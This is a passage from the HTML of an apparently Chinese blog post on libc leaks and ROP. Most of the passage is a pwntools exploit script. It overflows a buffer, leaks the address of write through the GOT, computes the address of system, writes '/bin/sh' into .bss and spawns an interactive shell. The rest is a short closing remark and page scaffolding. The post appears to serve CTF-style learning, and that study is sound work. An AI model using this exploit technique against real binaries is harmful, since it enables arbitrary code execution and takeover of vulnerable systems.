</span><span class="n">payload1</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span>  <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011e2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">write_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">write_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span>
<span class="n">payload1</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011c8</span><span class="p">)</span> <span class="o">+</span> <span class="s">'d'</span> <span class="o">*</span> <span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>

<span class="n">sh</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Hello, World</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
<span class="n">sh</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload1</span><span class="p">)</span>
<span class="n">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span>

<span class="n">write_addr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">sh</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span>
<span class="k">print</span> <span class="s">"write_addr= "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">write_addr</span><span class="p">)</span>
<span class="n">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span>

<span class="c1">#get the address of system and bin_sh
</span><span class="n">payload2</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011e2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">read_got</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bss</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011c8</span><span class="p">)</span> <span class="o">+</span> <span class="s">'d'</span><span class="o">*</span><span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>
<span class="n">sh</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload2</span><span class="p">)</span>
<span class="n">sh</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">system_libc</span> <span class="o">+</span> <span class="n">write_addr</span> <span class="o">-</span> <span class="n">write_libc</span><span class="p">))</span>
<span class="n">sh</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">"/bin/sh</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span>
<span class="n">sleep</span><span class="p">(</span><span class="mf">0.5</span><span class="p">)</span>
<span class="n">sh</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Hello, World</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>

<span class="c1">#activate the system("/bin/sh")
</span><span class="n">payload3</span> <span class="o">=</span> <span class="s">'a'</span><span class="o">*</span><span class="mh">0x88</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011e2</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bss</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">bss</span><span class="o">+</span><span class="mi">8</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4011c8</span><span class="p">)</span> <span class="o">+</span> <span class="s">'d'</span> <span class="o">*</span><span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">main</span><span class="p">)</span>
<span class="n">sh</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload3</span><span class="p">)</span>
<span class="n">sh</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>
<p>  至此，一个华丽的利用已经完成了.</p>

<blockquote>
  <p>以上是对x64libc泄漏的处理方式</p>
</blockquote>

<h4 id="书山有路勤为径学海无涯苦做舟">书山有路勤为径,学海无涯苦做舟</h4>



<div id="vcomments"></div>
<script>
  new Valine({
    el: '#vcomments',
    appId: '9PQd0VOdLBtIrk7DuYhbXgo1-gzGzoHsz',
    appKey: '0tooNX9XI400l94QiuBP0lXm',

    avatar:'robohash',
    visitor: true, // 阅读量统计
    enableQQ: true
  })
</script>

<!-- id 将作为查询条件 -->
<span id=/blog/%E5%85%B3%E4%BA%8Elibc%E4%B8%8Erop%E7%9A%84%E6%80%9D%E8%80%83 class="leancloud_visitors" data-flag-title="Your Article Title">
  <em class="post-meta-item-text">阅读量 </em>
  <i class="leancloud-visitors-count"></i>
</span>

</div>
  </main>

  <footer class="mt-auto py-3 text-center">

  <small class="text-muted mb-2">
    <i class="fas fa-code"></i> with <i class="fas fa-heart"></i>
    by <strong>Yvan</strong>
  </small>

  <div class="container-fluid justify-content-center">

</div><small id="attribution">
    theme <a href="https://github.com/YoussefRaafatNasry/portfolYOU">portfolYOU</a>
  </small>
  
</footer>
  <!-- GitHub Buttons -->
<script async defer src="https://buttons.github.io/buttons.js"></script>

<!-- jQuery CDN -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<!-- Popper.js CDN -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js"></script>

<!-- Bootstrap JS CDN -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>

<!-- wow.js CDN & Activation -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/wow/1.1.2/wow.js"></script>
<script> new WOW().init(); </script>

<!-- Initialize all tooltips -->
<script>
$(function () {
    $('[data-toggle="tooltip"]').tooltip()
})
</script>

</body>

</html>